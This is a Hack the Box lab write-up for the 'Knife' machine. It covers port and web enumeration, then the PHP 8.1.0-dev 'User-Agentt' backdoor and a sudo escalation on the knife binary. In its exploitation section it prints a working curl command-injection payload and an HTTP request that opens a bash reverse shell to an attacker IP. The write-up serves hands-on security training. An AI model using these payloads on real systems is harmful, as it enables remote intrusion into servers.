Hack the box - Knife
Updated: Apr 20, 2022
Knife is an extremely easy box that really shows the range of difficulties which can be within the "easy" band of Hack the box difficulties. This box catered to beginners and the experienced as you could simply copy and paste CVE scripts for your initial foothold, or try custom crafting the syntax yourself to make the exploit work for your initial foothold.
Command injection to code execution
Linpeas privilege's enumeration
As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack vector looks fairly narrow. As a result we will do a second stage scan to enumerate version information, with assistance from the nmap .NSE engine by using the following flags.
-sC - use default enumeration scripts
-sV - version enumeration
Our more in-depth nmap scan shows the expected ssh service followed by our HTTP website that is identified with the title "Emergent Medical Idea", this is fantastic information.
I noticed that port 1839 did not show up on the in-depth scan
Using a targeted scan by specifying port '1839' while calling the flag -Pn to disable the ICMP flag incase our firewall has a threshold trigger, that when combined with the nmap scripting engine, creates to much traffic. This however is not the case, and we do not get any further information.
As always, I like to start AutoRecon in the background after my initial enumeration to pickup any bits and pieces I may of left behind. This can sometimes take up to 30 minutes so we will check back later.
Upon browsing to port 80 we can see that this website is likely attributed to the medical field.
I start off with running a directory buster in the background to look for any hidden directories while I invest time actively enumerating this website. But unfortunately hidden directory results in nothing.
I was not able to click any of the sub menus in the upper right corner which was quite weird and suggestive that perhaps the page was still under development.
I proceeded to check the page contents and other than some basic scripts and formatting there was nothing interesting.
Let's check back on AutoRecon and see if anything was picked up over port 80 that I perhaps missed with only a surface level scan.
Browsing into the AutoRecon scans directory shows us many reports that we can view and we will go straight to the whatweb results. If you don't already know, whatweb is a very powerful tool for website enumeration. The results are listed below.
WhatWeb report for http://10.129.216.29:80 Status : 200 OK Title : Emergent Medical Idea IP : 10.129.216.29 Country : RESERVED, ZZ Summary : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.41 (from HTTP Server Header) Google Dorks: (3) Website : http://httpd.apache.org/ [ HTML5 ] HTML version 5, detected by the doctype declaration [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Ubuntu Linux String : Apache/2.4.41 (Ubuntu) (from server string) [ PHP ] PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 8.1.0-dev Google Dorks: (2) Website : http://www.php.net/ [ Script ] This plugin detects instances of script HTML elements and returns the script language/type. [ X-Powered-By ] X-Powered-By HTTP header String : PHP/8.1.0-dev (from x-powered-by string) HTTP Headers: HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 01:58:40 GMT Server: Apache/2.4.41 (Ubuntu) X-Powered-By: PHP/8.1.0-dev Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2406 Connection: close Content-Type: text/html; charset=UTF-8
Reviewing the output shows us that PHP is used in the development of the website and in particular version 8.1.0-dev. So lets take a look at this as I believe it is an older version we see here.
Enumeration - PHP version 8.1.0-dev
I came across a popular exploit that was found on exploit DB. This is not straight forward and involves researching the exploit and tampering around with the user agent field.
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
Here we enumerate through exploit DB and the packet storm exploits and after trying to manually execute system commands through the user agent we resort to trying the curl command.
CVE - Exploit DB -
CVE - PacketStorm
Code injection - curl
Eventually we solve this with the curl command.
curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php
Backdoor - Burpsuite
We also solve this by tinkering around with the syntax in burpsuite. Which eventually works and provide the callback to our listener.
GET /aaa.php HTTP/1.1 Host: 10.129.225.112 Upgrade-Insecure-Requests: 1 User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'"); Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
Our netcat listener catches the reverse shell.
I am largely in the habit of uploading privilege enumeration scripts such as linpeas however I always check for low hanging fruit in the users directory. Running a "sudo -l" command we actually see a result which is likely the path to root.
Knife enumeration and GTFO bins
After tampering around with the knife binary, and failing to inject code, abuse the symbolic link, I eventually looked it up on GTFO bins where I found sudo abuse and we made our way to root.